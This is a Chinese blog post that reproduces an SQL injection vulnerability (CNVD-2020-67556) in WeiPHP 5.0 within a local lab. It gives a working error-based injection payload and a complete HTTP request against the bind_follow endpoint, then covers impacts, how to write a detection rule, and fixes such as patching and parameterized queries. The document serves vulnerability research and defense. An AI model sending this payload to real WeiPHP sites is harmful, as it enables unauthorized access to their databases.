WeiPHP5.0 SQL注入(CNVD-2020-67556 )漏洞复现

最新推荐文章于 2024-04-21 14:08:32 发布
最新推荐文章于 2024-04-21 14:08:32 发布
阅读量510 收藏
点赞数
文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68999845/article/details/133136588
版权

WeiPHP5.0 SQL注入(CNVD-2020-67556 )

一、漏洞概述

1.1漏洞简述

  • 漏洞名称:WeiPHP5.0 SQL注入(CNVD-2020-67556 )
  • 漏洞类型:SQL注入
  • 漏洞威胁等级:高危
  • 影响范围:version = 5.0
  • 利用条件:默认配置

1.2组件描述

weiphp5.0基于ThinkPHP5.1开发

1.3漏洞描述

**参考:**​https://forum.butian.net/share/1890

二、漏洞复现

2.1应用协议

HTTP

2.2环境搭建

通过GitHub将weiphp5.0源码下载到本地,利用PHPstudy将源码环境搭建起来

https://github.com/weiphpdev/weiphp5.0

2.3漏洞复现

1.使用如下payload,其中利用SQL注入的报错注入进行版本查询。

updatexml(1,concat(0x7e,(select version()),0x7e),1)

2.发送如下HTTP请求:

GET /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,(select%20version()),0x7e),1)--+ HTTP/1.1
Host: 192.168.33.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic emVudGFvOkY3STROemhVb2Zu
Connection: close
Cookie: PHPSESSID=e7uu1jfu914bohhsp6prpgnos2
Upgrade-Insecure-Requests: 1

3.在本地成功通过报错注入查询版本。

​​在这里插入图片描述

三、漏洞分析

3.1技术背景

weiphp5.0基于ThinkPHP5.1开发

3.2代码分析

**参考文档:**​https://forum.butian.net/index.php/share/1890

3.3漏洞危害

  1. 数据库信息泄露:数据库中存放的用户的隐私信息泄露
  2. 网页的篡改:通过操作数据库对特定的网页进行修改
  3. 网站被挂马:传播恶意软件:修改数据库一些字段的值。嵌入网马链接,进行挂马攻击。
  4. 数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员账户被篡改。
  5. 服务器被远程控制,被安装后门,经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作

四、漏洞检测

4.1漏洞检测规则、插件编写思路

首先检测被检测网站是否是weiphp5.0,如果为weiphp5.0,则插入如上payload,查看响应包中是否存在关键字并进行检测。若存在故此网站存在weiphp5.0SQL注入漏洞。

4.2研判建议

对插入payload的响应包进行关键字检测,若存在关键字,故存在漏洞。

五、防范建议

5.1官方修复建议

官方已发布了最新补丁来修复该漏洞,请升级至最新版本。

5.2临时修复建议

  1. 使用预处理
  2. 所有查询语句都使用数据库提供的参数化查询接口,并且参数化语句使用参数,而不是将用户输入变量嵌入SQL语句中,几乎所有当前的数据库系统都提供参数化的SQL语句执行接口。使用此接口可以有效的防止SQL注入攻击。

六、参考链接

https://forum.butian.net/share/1890

七、备注

攻击成功.pcap

正常流量.pcap

Tkite
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
WeiPHP 微信开发平台 SQL注入漏洞复现
0xSec
12-05 910
weiphp微信开发平台 _send_by_group、wp_where、 get_package_template等接口处存在SQL注入漏洞,攻击者利用此漏洞可获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1179
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
网络安全SQL注入漏洞复现(中篇)(技术进阶)
最新发布
weixin_70911257的博客
04-21 1248
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
WeiPHP5.0远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-12 722
weiphp 是一个开源,高效,简洁的微信开发平台,它是基于 oneThink 这个简单而强大的内容管理框架实现的。weiphp 的目的是最大化的简化微信开发的流程,使用开发者能把最好的精力放到微信具体业务开发,并能以最快的时间完成。把一些常规而频繁的工作交由 weiphp 来处理即可。
SQL注入漏洞修复方案及代码审计
fengxioabai的博客
03-18 1043
⼀个成功的SQL注⼊攻击可以从 数据库中获取敏感 数据、修改数据库数据(插⼊/更新/删除)、执⾏数据库管理操作 (如关闭数据库管理系统)、恢 复存在于数据库⽂件系统中的指定⽂件 内容,在某些情况下能对操作系统发布命令。由于⽤户的输⼊,也是SQL语句的⼀部分,所以 攻击者可以利⽤这部分可以控制的内容,注⼊⾃⼰定义的语句,改变SQL语句 执⾏逻辑,让数据库执⾏任意⾃⼰需要 的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何⾃⼰需要的数据,利⽤数据库的⼀ 些特性,可以直接 获取数据库服务器的系统权限。
DVWA-sql注入漏洞复现
qq_68238790的博客
12-04 191
SQL注入漏洞Web层面最高位的漏洞之一。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生sql注入
vulhub靶场sql注入漏洞复现
赵花花08042的博客
12-13 3183
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234) https://github.com/vulhub/vulhub/blob/master/django/CVE-2019-14234/README.zh-cn.md https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483996&idx=1&sn=4254dc0a54003cccb29dd42935f8ccea.
weiphp5.0 cms审计之exp表达式注入 - 先知社区1
08-03
Weiphp5.0 CMS审计之EXP表达式注入漏洞 Weiphp5.0 CMS是中国知名的开源内容管理系统,然而,最近发现了一个EXP表达式注入漏洞,该漏洞存在于Weiphp5.0 CMS的Index控制器的bind_follow方法中。该方法使用了ThinkPHP...
weiphp微信公众平台框架 v3.0 正式版
12-10
weiphp是一个开源,高效,简洁的微信开发平台,它是基于oneThink这个简单而强大的内容管理框架实现的。
weiphp3.0_892-内测包 建议不要商用,只用测试
11-23
weiphp3.0_892-内测包 建议不要商用,只用测试
WeiPHP-SWXZS:生物小助手
05-01
#生物小助手陕西师范大学 生物学院微信平台后台程序系统@author Ling.基于WeiPHP 2.0
WeiPHP2.0 + WeiPHP3.0 两个版本的初始压缩包(官方纯净版)
10-11
WeiPHP2.0 + WeiPHP3.0 两个版本的初始压缩包(官方纯净版) 压缩包内包括两个压缩文件,一个是weiphp2.0的版本,一个是weiphp3.0的版本 WeiPHP2.0说明: 本包为2.0稳定版本 最低系统要求: PHP 5.3.0+ MySQL 5.0+ WeiPHP3.0说明: 本包版本为WeiPHP3.0_20160531_2005版 系统安装教程: 1、将weiphp压缩包解压并上传到服务器。 2、首次在浏览器中访问index.php,将会进入安装向导
weiphp微信公众平台 v4.0 beta.zip
07-06
weiphp微信公众平台 v4.0 beta更新日志 1.更加人性化的后台操作 2.更多公众号接口的实现 3.更加简单而快捷的微信二次开发 weiphp微信公众平台简介 weiphp是一个开源,高效,简洁的微信开发平台,它是基于one...
DataEase SQL注入漏洞 (CVE-2022-34114)
weixin_68999845的博客
07-21 890
CVE-2022-34114漏洞搭建及复现
SQL注入的场景复现和解决方案
欢迎来到 ABin-阿斌的博客:写一生代码,创一世佳话,筑一览芳华。
03-12 1136
SQL注入(SQL Injection)是一种常见的网络攻击技术,它利用应用程序没有正确过滤用户输入的数据,将恶意的 SQL 代码注入到应用程序中执行,从而导致应用程序的安全性受到威胁。通简单来说,就是通过构造恶意的 SQL 语句,将恶意代码注入到应用程序中执行,从而实现各种攻击手段。
youdiancms 9.5.0 版本 SQL注入(vulfocus复现
qq_40646572的博客
04-24 1207
从上述信息,可以看到,web服务的80端口被映射到62461端口,并且该服务对外开启了3306端口并映射到20130 端口。并且给了数据库的相关信息。
微信 移动框架 php,weiphp该如何使用?
weixin_33364018的博客
03-18 198
微信的开发框架是学习开发微信相应功能必备的一个步骤,开发框架是有多点的,比如你会见到thinkphp,yii它这些也是可以的,本文将是要为大家讲述的是weiPHP开发框架的一个使用,有不懂的朋友们可以关注一下,一起来学习一下。有些朋友有时候会去借助weiphp来进行微信公众平台相关业务的开发,或者有很多人都没有这一方面的一个经验,但可以是通过一些文档和代码也是能比较快地了解weiphp的一些业务的...
sql注入】sqlmap+DNSlog外带数据 注入复现
C_LCH_2000的博客
08-19 1982
DNSlog注入 dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据 利用场景 在sql注入为布尔盲注、时间盲注时,如果遇到大量的数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入
JeecgBootSql二次注入复现
weixin_45803562的博客
03-23 1331
漏洞复现

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tkite

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值